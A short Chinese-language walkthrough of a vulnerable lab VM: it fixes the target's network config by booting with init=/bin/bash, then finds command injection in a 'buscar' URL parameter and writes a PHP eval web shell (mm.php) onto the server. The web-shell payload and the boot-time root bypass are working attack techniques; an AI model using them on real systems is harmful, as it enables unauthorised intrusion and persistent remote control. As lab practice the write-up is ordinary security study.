打开靶机,打开kali,有的人会发现扫不到靶机的ip
在网上搜索了半天,发现是靶机的网卡配置有问题
重启靶机,选第二个
进去后再选第二个,按e
找到ro这一行
把ro后面这一行的内容都替换成ro = rw signin init=/bin/bash
ctrl+x
输入ifconfig -a查看一下自己的网卡名称,我是ens33
在输入
cd etc
cd network
vim interfaces
改下这个网卡名称就好了
按shift+/
输入wq保存
重启靶机
再打开kali扫描一下就出来靶机的ip了
去访问
我们进入网站以后,首先扫描一下端口,发现没有有用的信息,在扫一下后台,目前也没有什么有用的信息
我们在点击页面上的size
我们翻了翻,发现了点进buscar中页面空白,但是网址上有一个buscar的参数
我们经过尝试之后,竟然可以执行系统命令
那么我们尝试写个木马进去
一开始我写的是echo '<?php @eval($_POST['cmd']); ?>' > mm.php
但是经过测试,会乱码,多次尝试之后把POST中的cmd缩短,并且把单引号去掉就好了
输入echo '<?php @eval($_POST[c]); ?>' > mm.php
在去访问mm.php
检查一下是否写入成功
写入成功!!!